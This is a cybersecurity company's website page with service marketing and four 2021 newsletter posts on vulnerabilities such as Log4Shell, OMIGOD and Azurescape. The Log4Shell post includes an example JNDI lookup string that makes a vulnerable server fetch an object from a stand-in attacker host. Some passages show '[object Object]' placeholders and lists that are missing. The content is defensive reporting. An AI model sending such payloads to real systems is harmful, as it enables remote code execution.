Empowering Clients to the next level of Cybersecurity

A Cybersecurity Partner You Can Trust

We are Strategists, Engineers, Analysts, and Governance Experts embedded in the world’s biggest cyber missions and trusted to advance them.

Our high standards in servicing clients are exemplified through information security, quality and IT service management certifications, both at individual and organisational levels.
Our Services
Managed Detection & Response

CyBourn’s Managed Detection and Response Service maintains seamless integration with our clients’ IT infrastructure and processes. We deliver optimum levels of hardware and software integration, enabling analysts to rapidly detect threats. Our incident handling process ensures that threat mitigation activity commences immediately following identification.

Managed Detection & Response
Our Services
Penetration Testing

Penetration Testing is a method for gaining assurance in the security of an IT system by attempting to breach some or all of that system’s security, using the same tools and techniques as an adversary might. Penetration testing should be viewed as a method for gaining assurance in your organization’s vulnerability assessment and management processes, not as a primary method for identifying vulnerabilities.

pen-testing
Our Services
Incident Response

Our incident response methodology is designed to provide a common framework for our incident responders to work and interact as part of the SOC eco-system in order to react quickly and effectively to identified threats within infrastructure while coordinating their actions with monitoring and detection teams as well as other incident responders.

incident-response
Our Services
Threat Hunting

Our threat hunting methodology is designed to provide a common framework for our threat hunters to work and interact as part of the SOC eco-system in order to provide focused targeted threat detection and effective continuous improvement to our automated detection and response capabilities.

threat-hunting
Our Services
Cybersecurity Awareness Training

Cybourn builds and executes complex social engineering scenarios to test awareness levels of internal staff. As the number one entry point for data breaches, phishing techniques are very hard to mitigate. The best solution to cope with such threats is maintaining high levels of awareness.

cyber-awareness

Secure your remote workforce

Implementing effective cybersecurity measures is particularly challenging today because there are more devices than people, attackers are becoming more innovative, and we are facing the fact that there will forever be more remote workers in the new post-pandemic world.

The latest cyberoffensive intelligence to identify and address security risks

Defending against cyber threats requires an in-depth understanding of how attackers operate. Our extensive experience of conducting pen testing, red teaming and other ethical hacking engagements around the world means we have first-hand knowledge of the latest adversarial tactics and wide-ranging insight into how to safeguard against them.

Incorporating your tools 

CyBourn delivers ultramodern solutions in consultation with our clients’ IT and risk departments enabling a high degree of scalability and customisation. We can utilise existing client tools, or act as security integrators to recommend and implement open-source, commercial, or off-the-shelf products.

CyBourn takes a unique bespoke approach to developing cybersecurity solutions

We deploy SOAR (Security Orchestration, Automation, and Response) solution stack to ensure deep visibility, continuous analysis, and rapid response. If an existing product or solution does not offer the needed level of visibility for you, CyBourn can build custom tools to collect relevant data.

CyBourn leverages bespoke ML algorithms.

CyBourn leverages machine learning algorithms to build network and user behavioural patterns, detect anomalies accurately, perform in- depth investigations, and act swiftly to contain potential threats, enhance proactive analysis, and map behaviour.

Drive decisions through powerful data

Integrate your essential data and information security indicators to empower your data driven decision making and response capabilities with Etherlast.

We offer global coverage

Enabled by our global R&D and continuous internal development process, we cover the entire cybersecurity landscape for enterprises across industries, sectors and geographies.

End-to-end solutions

We live the policies, architectures, and intelligence that define cyber enterprises and operations. Our experts have significant experience in offering state-of-the-art monitoring solutions, best in class incident response services, and tailored strategic cybersecurity consulting.

Secure your remote workforce

Implementing effective cybersecurity measures is particularly challenging today because there are more devices than people, attackers are becoming more innovative, and we are facing the fact that there will forever be more remote workers in the new post-pandemic world.

The latest cyberoffensive intelligence to identify and address security risks

Defending against cyber threats requires an in-depth understanding of how attackers operate. Our extensive experience of conducting pen testing, red teaming and other ethical hacking engagements around the world means we have first-hand knowledge of the latest adversarial tactics and wide-ranging insight into how to safeguard against them.

Incorporating your tools 

CyBourn delivers ultramodern solutions in consultation with our clients’ IT and risk departments enabling a high degree of scalability and customisation. We can utilise existing client tools, or act as security integrators to recommend and implement open-source, commercial, or off-the-shelf products.

CyBourn takes a unique bespoke approach to developing cybersecurity solutions

We deploy SOAR (Security Orchestration, Automation, and Response) solution stack to ensure deep visibility, continuous analysis, and rapid response. If an existing product or solution does not offer the needed level of visibility for you, CyBourn can build custom tools to collect relevant data.

CyBourn leverages bespoke ML algorithms.

CyBourn leverages machine learning algorithms to build network and user behavioural patterns, detect anomalies accurately, perform in- depth investigations, and act swiftly to contain potential threats, enhance proactive analysis, and map behaviour.

Drive decisions through powerful data

Integrate your essential data and information security indicators to empower your data driven decision making and response capabilities with Etherlast.

We offer global coverage

Enabled by our global R&D and continuous internal development process, we cover the entire cybersecurity landscape for enterprises across industries, sectors and geographies.

End-to-end solutions

We live the policies, architectures, and intelligence that define cyber enterprises and operations. Our experts have significant experience in offering state-of-the-art monitoring solutions, best in class incident response services, and tailored strategic cybersecurity consulting.

UI2C
UI1C
UI3C
UI2CUI1CUI3C
What’s trending at CyBourn
The Cybersecurity Express – Issue #4
Blog | 17 DEC, 2021
The Cybersecurity Express – Issue #4
Cybourn’s very own Cybersecurity Express is once again leaving for fresh and exciting destinations. Hop aboard and journey through the latest news in cybersecurity. As usual, welcomed onboard and we are sure that you are eager to see what stops we will be making today. Everything seems to be in order, at first glance at the schedule. However, soon you start noticing something odd: most of the stops are closed for maintenance due to the same reason. How can it be that so many stations, so far apart, unrelated to each other, each serving its unique purpose, are all affected by the same faulty module? Can one module be so widely used?! Yes, and such is the case with this week’s spotlight program, Log4J! Log4J and the Log4Shell vulnerability. More like LogFromHell. If a couple of days ago, only a few knew about this module, now it’s the talk of the town. That is, if you haven’t been living under a rock. If you have though, don’t worry, the Cybersecurity Express will bring you up to speed, with a complete picture of the chaos from the past few days. Before we get into the mess of it all, let’s dig into a little bit of the background, shall we? Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers and spring-Boot web applications, but also used to log events and messages generated by software applications, some of which you might have heard of. By few, we really mean an unimaginable number because we’re talking about: An extensive list on the known vulnerable applications is listed by the Dutch National Cyber Security Centre, in its GitHub repository , and believe me, it is quite a long scroll to get to the bottom. Signs of exploitation attempts and weaponization began to surface ten days before the vulnerability came to light, and since then, we have seen attackers exercising cryptocurrency miners, Cobalt Strike drops, ransomware, and botnet recruitment. “Earliest evidence we’ve found so far of Log4j exploit is 2021-12-01 04:36:50 UTC… However, we don’t see evidence of mass exploitation until after public disclosure.” researchers said. It is impossible to say for certain when this was first exploited, but the danger of JNDI lookups was mentioned in Blackhat talk all the way back in 2016, and somehow went under the radar, and, since the Apache Log4j 2.0-beta9 release was on September 21 2013, it is possible that a witty actor discovered this soon after. Dubbed Log4Shell, CVE-2021-44228 has a CVSS score of a “perfect” 10, and that’s as high as they go. That score is due to the widespread use of the program and the relative ease with which the exploit can be applied, allowing remote code execution in Log4j versions 2.0-beta9 up to 2.14.1. What makes this exploit so easy? JNDI (Java Naming and Directory Interface) and LDAP  can be used together by a Java program to locate a Java JNDIObject from an LDAP server operating on the same computer (localhost) on port 389 and reads attributes from it using the URL ldap:/localhost:389/o=JNDIObject. An attacker can control the LDAP URL by causing Log4j to try to write a string like ${jndi:ldap:/payload.com/a} resulting in a connection to payload.com and retrieve the object. And, because of how Log4j is built, all it takes to leverage the vulnerability is to send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher. We used LDAP for this example but it can work with either LDAP, RMI or DNS. What are the attackers after? “The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,” Microsoft 365 Defender Threat Intelligence Team said. “Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.” A group of attackers managed to remote code execute (RCE) and download a .NET binary, from a remote server, that encrypts all the files with the extension “.khonsari” and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files. It’s hard to say what the end goal is here, and it is just as hard to compile a list of IOCs, because hackers are taking a spray-and-pray approach just to wreak havoc. “This vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string,” Security expert Marcus Hutchins tweetd . The overall scale of this is hard to grasp, but measures like the Cybersecurity and Infrastructure Security Agency (CISA) giving federal agencies an ultimatum to patch systems against the critical vulnerability, and the fact that Ingenuity (NASA’s helicopter mission on Mars) is susceptible to this exploit, kid of puts it in perspective. Oh, and by the way, this last-mentioned fact, makes this the first interplanetary exploit… probably. Despite that, researchers had been hard at work compiling list of checks, GitHub repositories, and tools you can use to see if you are vulnerable, apply workarounds to mitigate the attack or find traces of exploit. What can you do? If your organization uses the log4j library, upgrade to log4j-2.16.0  immediately. You should also be sure that your Java instance is updated. From Log4j 2.15.0 on, this behavior has been disabled by default. To make things worse, the release of the patched version, came with news of another vulnerability CVE-2021-45046 revealing that the module is also prone to a denial of service attack, which attackers are now also exploiting. Also, consult the Git repositories to see what helps, check the list of affected vendors and apply the latest patches particular to each software, should they be released. If, for any reason, you are unable to update, you could: As this ride onboard the Cybersecurity Express draws to an end, you feel relieved and now are better prepared to face Log4Shell exploit. This is indeed a subject worthy of the entire attention it’s getting. We bid you goodbye humbly await your return onboard. 
The Cybersecurity Express – Issue #3
Blog | 2 NOV, 2021
The Cybersecurity Express – Issue #3
You just got your ticket, and you look at your watch: Ugh, you’re late. Your fist tightens the grip on your briefcase as you start running towards the platform. A powerful whistle can be heard as the engine cranks the wheels in motion. You make a dash, grab hold of the rail, and hoist yourself up the wagon door. You made it on board the Cybersecurity Express! In front of you, the schedule reads: ‘Trojan source’ can this be your new nightmare? SQUIRRELWAFFLE, phishing is back, and it’s used to gain access to enterprise networks. Followed by a flaw in macOS found by Microsoft and a new windows LPE zero-day vulnerability found, among others. ‘Trojan Source’ The Stuff of Nightmares Cambridge University researchers Nicholas Boucher and Ross Anderson published a paper stating that all compilers are subjectable to malicious code injection by threat actors, that goes on without detection. Researchers said that “ the attack exploits subtleties in text-encoding standards such as [object Object] to produce source code whose tokens are logically encoded in a different order from the one in which they are displayed, leading to vulnerabilities that cannot be perceived directly by human code reviewers ”. Spotlighted as CVE-2021-42574 and CVE-2021-42694 they affect compilers of all popular programming languages such as C, C++, C#, JavaScript, Java, Rust, Go, and Python. This issue takes advantage of Unicode’s bidirectional algorithm which enables support for both left-to-right (English) and right-to-left (Arabic) languages. These, however, can be used interchangeably within the same code and can allow writing left-to-right words inside a right-to-left sentence, or vice versa, thus allowing for software vulnerabilities to be injected in a practically invisible manner, further trickling down the supply chain. Unfortunately, this is not something that one entity can fix, and will have to be eradicated with an industry joint effort. Squirrelwaffle, from Spam Campaign to Infection Researchers uncovered a malspam campaign used to deliver malicious Microsoft Office documents that set the stage for later infection and are “ used to facilitate the delivery of additional malware such as [object Object] and [object Object] , two of the most common threats regularly observed targeting organizations around the world ” Mid-September 2021 Talos engineers observed campaigns that tricked users into opening malicious payload by leveraging stolen email threads, making them appear to be replies to existing emails, typically contain hyperlinks to malicious ZIP archives. Interestingly, some sort of dynamic localization is used as the malicious emails are in the same language as detected in the thread to which they respond, making them more authentically convincing. As it is with human engineering, there is no better protection than a well-informed employee, so make sure you and your colleagues attend those cybersecurity briefings. MacOS Vulnerability Found by … Microsoft?! In stranger news, it seems it’s more lucrative to find vulnerabilities in someone else’s back yard, rather than in your own. The so dubbed ‘Shotless’ flaw is already accounted for as CVE-2021-30892 and fixed with macOS Monterey Patch 12.0.1. This vulnerability allows attackers to bypass System Integrity Protection (SIP) and perform malicious activities, like gaining root privileges and installing rootkits on the device. System Integrity Protection , also referred to as rootless, is a macOS security feature introduced in OS X El Capitan, in 2015, that restricts a root user from performing operations that may compromise system integrity. Only processes signed by Apple are allowed to modify those protected parts of the OS. “While assessing macOS processes entitled to bypass SIP protections, we came across the daemon system_installd, which has the powerful com.apple.rootless.install.inheritable entitlement. With this entitlement, any child process of system_installd would be able to bypass SIP filesystem restrictions altogether.”, saidMicrosoft. Microsoft even made a proof-of-concept (POC) exploit to override the kernel extension exclusion list: LPE Zero-day Vulnerability in Windows While Microsoft is busy finding vulnerabilities in other vendor software, researchers are finding vulnerabilities in Windows, it’s only fair. Back in August, Microsoft patched “Windows User Profile Service Elevation of Privilege Vulnerability” – CVE-2021-34484 . After examining the fix, researchers were able to bypass it with a new exploit that was published on GitHub, claiming that Microsoft only fixed what was the result of the PoC, but didn’t handle the underlying issue. This exploit will cause an elevated command prompt with SYSTEM privileges to be launched while the User Account Control (UAC) prompt is displayed. The severity of this bug is downplayed by the fact that the attacker must already have two user credentials to be able to pull this off.   We have arrived back at the station and in conclusion… What exciting stops we have had today, but everything must draw to an end, the train must head back to fuel for new and exciting destinations, but not before visiting a few noteworthy events in the world of cybersecurity: We hope you enjoyed traveling onboard the Cybersecurity Express and we await your return. Until next time, stay safe!
The Cybersecurity Express – Issue #2
Blog | 29 SEP, 2021
The Cybersecurity Express – Issue #2
You made it just in time, for the second departure of the Cybersecurity Express. The whistle blows, wheels start spinning, so thus the journey begins! Today we will make a stop at “Dark Basin” – a massive Hack-For-Hire operation uncovered by Citizenlab , a scandal on which, CyBourn’s very own, Ashwin Jayaram, CyBourn CEO, was interviewed by the New York Times. Our second stop is an Azure active directory flaw that allows for unlimited password guessing. Lastly, a brand-new way malware can use to escape detection on Windows. Dark Basin – “You desire, we do” That literally is their slogan – “You desire, we do”. An Indian company, BellTroX InfoTech has been linked with massive Hack-For-Hire operation uncovered by Citizenlab . Talking about hiding in plain sight… Dark Basin is a hack-for-hire group that has targeted countless individuals and institutions. Targets include advocacy groups and journalists, elected and senior government officials, hedge funds, and multiple industries, many of which being organizations working on a campaign called #ExxonKnew , which claims that ExxonMobil hid information about its impact on climate change for decades.   “The lawsuit filed last month in Federal Court in North Carolina, by an Iranian aviation executive, Farhad Azima, alarmingly alleges collaboration between a web of international law firms, private investigators and hackers in India, claiming that such tangled relationships are common in hacking for hire schemes, so that intermediaries can be used to obfuscate who may be ultimately responsible for a hacking attempt and make it difficult for investigators to peel back the layers to the ultimate source. Hacking for hire schemes clearly fall foul of section 43 of the IT Act and shall constitute “unauthorised access”, What action is taken legally against such activities mushrooming in India could actually determine if the country’s famous IT Sector retains it global reputation or gets a bad name.”, says Salman Waris, Partner at TechLegis . Through tedious collaboration with dozens of targeted organizations and individuals, using a mix of open-source intelligence and investigations and some good old journalism, Citizenlab was able to link Dark Basin’s activity, with high confidence, to individuals working at an Indian company named BellTroX InfoTech Services (and possibly other names)”. It seems that BellTroX’s director, Sumit Gupta, despite being indicted in California in 2015 for his role in a similar hack-for-hire, is still in this dirty business. The investigation revealed a combination of Timestamps UTC+5:30(India time zone), URL shorteners and copies of a phishing kit source code available openly online that all pointed to BellTroX involvement. Not to mention that some employees utilized personal information as bait content when testing their URL shorteners, information also left publicly available. Don’t be so quick to this is think sloppy work, because they also made social media posts taking credit for attack techniques containing screenshots of links to Dark Basin, so they were mostly bragging about their endeavors, probably to gain notoriety in that “line of work”. Organizations such as: Rockefeller Family Fund , Greenpeace , Center for International Environmental Law , Union of Concerned Scientists (just to name a few) gave consent to be publicly disclosed as being targets of the attackers. Many other companies prefer to remain anonymous. The perpetrators went so far as to makings websites that look identical to popular online web services such as Google Mail, Yahoo Mail, Facebook, and others. If you are an organization fighting against big oil moguls, or find any common goals as the organizations targeted, It’s best you use the IOCs released by Citizen on github to check if you were/are a target of the malicious group. Some of the useful information on github includes: Azure Active Directory password bug Researchers gave word of a recently discovered flaw in the protocol used by Azure Active Directory Seamless Single Sign-On  service that allows for continuous brute-force of an AD user’s credentials. And if “That sounds impossible!” you may say, it’s because these attempts aren’t logged on to the server. Usual anti brute-force mechanisms rely on logs and specific error codes. “This flaw allows threat actors to perform single-factor brute-force attacks against Azure Active Directory without generating sign-in events in the targeted organization’s tenant,” explain the researchers. Seamless SSO allows users access to Azure AD without the need of credential input if they are in the networked premise. “This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components,” explains Microsoft . Here’s a short version of how the Seamless SSO mechanism is vulnerable: These authentication steps of Autologon to Azure AD are not logged, thus allowing threat actors to utilize the usernamemixed endpoint for undetected brute-force. Microsoft is considering this a “design choice”, not a vulnerability and it’s unclear if the flaw would be fixed. Until then, organizations are at risk of sneaky brute-force attacks. Maybe we need to use passwords longer than the cybersecurity train?! Undetectable Malware on Windows Google cybersecurity researchers revealed a new technique adopted by threat actors to conceal malicious payloads using malformed digital signatures. The usual technique involves using illegally obtained digital certificates to sneak adware and other unwanted software past malware detection tools, by masquerading as legitimate software or by embedding the attack code into legitimate digitally signed software components. This new technique stands out for its intentional use of malformed signature to give defenses the old slip. This was observed with a known family of adware called OpenSUpdater , where most of the targets of the campaign are users who are prone to downloading cracked versions of games and other grey-area software. “Attackers created malformed code signatures that are treated as valid by Windows but are not able to be decoded or checked by OpenSSL code – which is used in a number of security scanning products,” said Google Threat Analysis Group’s Neel Mehta, “This is the first time TAG has observed actors using this technique to evade detection while preserving a valid digital signature on PE files”. The artifacts are signed with an invalid leaf X.509 certificate that’s edited in such a manner that the ‘parameters’ element of the SignatureAlgorithm field included an End-of-Content (EOC) marker instead of a NULL tag. Some antivirus engines were able to detect the malware, Windows Defender being one of them. Other reputable antivirus companies need to implement changes so that their software also detects this kind of threat.                 As the Cybersecurity Express starts heading back to the depo, we still catch a glimpse of this subject: “Not less than 11 vulnerabilities disclosed in Nagios network management systems, that allow attackers remote code execution with the highest privileges and more! Make sure to keep exploits at bay with updates in Nagios XI 5.8.5 or above, Nagios XI Switch Wizard 2.5.7 or above, Nagios XI Docker Wizard 1.13 or above and Nagios XI WatchGuard 1.4.8 or above systems”. For updates like this, that are posted within 24 hours of their disclosure, make sure to follow CyBourn on LinkedIn and Twitter . Hope to see you onboard again, soon.
The Cybersecurity Express
News | 16 SEP, 2021
The Cybersecurity Express
CyBourn is launching the Cybersecurity Express, bringing you trending subjects in sizeable chunks! Hop aboard and let us take you on a journey of what’s happened during the past days in the trilling world of Cybersecurity. Mind the gap and keep your limbs and heads inside the vehicle at all times, because we are passing at high speed through attacks, zero-day vulnerabilities and exciting news. We are now arriving at our first destination: Microsoft Releases patch for Office 365 zero-day attacks You may be familiar with Microsoft disclosed vulnerability CVE-2021-40444 , in which Windows Server 2008 through 2019 and Windows 8.1 through 10 systems are susceptible to attack via a malicious ActiveX control used by a Microsoft Office document that hosts the MSHTML browser rendering engine. A patch has been released on September 14 th , this mitigation method being advised above all other workarounds proposed by specialists so far: having “protected mode” on, modifying registry keys etc. The widows updates are a must, after the mitigations proposed by Microsoft were bypassed successfully and the attack was carried out even with files that have no MoTW (Mark of the Web) flag, for which “protected mode” does not apply. We can only hope this patch put an end to the ActiveX nightmare for good and eliminates all other bypass possibilities. See the vulnerability official page , “Security Updates” section for more information on the cumulative updates, which also address other 60 vulnerabilities (86 including Microsoft Edge), fixing one bonus unexploited zero day: CVE-2021-36968 – Windows DNS Elevation of Privilege Vulnerability Microsoft Azure’s “OMIGOD” and “ChaosDB” vulnerabilities “OMIGOD” Impacting Azure Linux virtual machines that use the Open Management Infrastructure (OMI). This utility is intended to function similarly to Windows WMI service allowing for collection of logs and remote management commands. OMI is built to require authentication, binding commands to a user ID, but a bug allows for malformed requests that manage to skip the authentication phase and are interpreted as coming from root. Even worse, the tool can be configured for remote management, whilst running an HTTPS server on port 5986 which can be connected to with a standard HTTPS client like curl and receives XML-derived  SOAP protocol commands. A compromised system will allow the attacker to run arbitrary commands as root using OMI syntax. More so, if OMI is configured to  listen on a network port, the attacker can use that get control of other virtual machines on the same network. CVEs issued being tied to this OMI utility exploit: Not all hope is lost, to mitigate this threat you can use your platform’s package tool to upgrade OMI, with commands such as: “ sudo apt-get install omi ”, to the the latest version v1.6.8-1 of the software. You can first check to see if you are vulnerable by connecting to your Azure VMs and run the commands below to see the OMI version installed: In the cases where OMI listens on TCP ports, limiting access to these ports via Linux firewall, is advised. A global firewall deny rule, with allow rules only for specific machines that need to access a given service is always a good measure. “Chaos DB” This may be old news, as it was reported to Microsoft back in August, still poses a major threat, because any Cosmos DB account that had Jupyter Notebook enabled could be compromised. Microsoft security teams took immediate action to disable the notebook service, right after the critical vulnerability was reported to them. Remediated or not, users are still required to perform mitigation steps due to the risk that their Cosmos DB primary keys were obtained by malicious actors. Using a chain of vulnerabilities in the Jupyter Notebook feature of Cosmos DB, an attacker can query information about the target, obtaining a set of credentials that can be used to view, modify, and delete data in the Cosmos DB account. Follow this Microsoft guide to regenerate your Cosmos DB Primary Key, should this mitigation be applicable in your organization. Approaching our final stop: ‘Azurescape’, a first Kubernetes container escape Microsoft keeps making the headlines, with yet another critical vulnerability discovered, “the first cross-account container takeover in the public cloud” researchers say. A malicious Azure actor could compromise the multitenant Kubernetes clusters hosting ACI, establishing full control over other users’ containers, enabling him to steal customer secrets and images deployed to the platform, and possibly abuse ACI’s infrastructure for cryptomining. By deploying a WhoC to ACI, researches managed to read the container runtime and were shocked to find runc version v1.0.0-rc2, released way back in October 2016, known to be vulnerable to at least two container breakout CVEs. All that was left was to modify a PoC container image and deployed it to ACI to get a reverse shell running as root on the Kubernetes node. Once here, they monitored the traffic on Kubelet port 10250 for a request that includes a JWT token in the authorization header. Used the az container exec to run a command on the uploaded container, resulting in the bridge pod sending an exec request to the Kubelet on the compromised node. Finally, back on the node, they extracted the bridge token from the request’s authorization header and used it to pop a shell on the api-server. Voilà! Consequently, Microsoft released a patch to ACI. The bridge pod no longer sends its service account token to nodes when issuing exec requests, preventing the reported cross-tenant attack. Also the bridge now verifies that a pod’s status.hostIP field is a valid IP before sending an exec request. It’s been a rough month for Microsoft, but this is the way of the digital world today. Before we end, here are some mention worthy events: Thank you for riding in the Cybersecurity Express, please don’t forget to take any personal belongings and stay safe by installing updates and patches regularly. Thank you for hitching a ride on the CyBourn Cybersecurity Express. Hope to have you on board for our next departure, soon!

Tell us about your Cybersecurity needs

We are strategists, engineers, analysts, and governance experts embedded in the world’s biggest cyber missions and trusted to advance them. Let us help you today.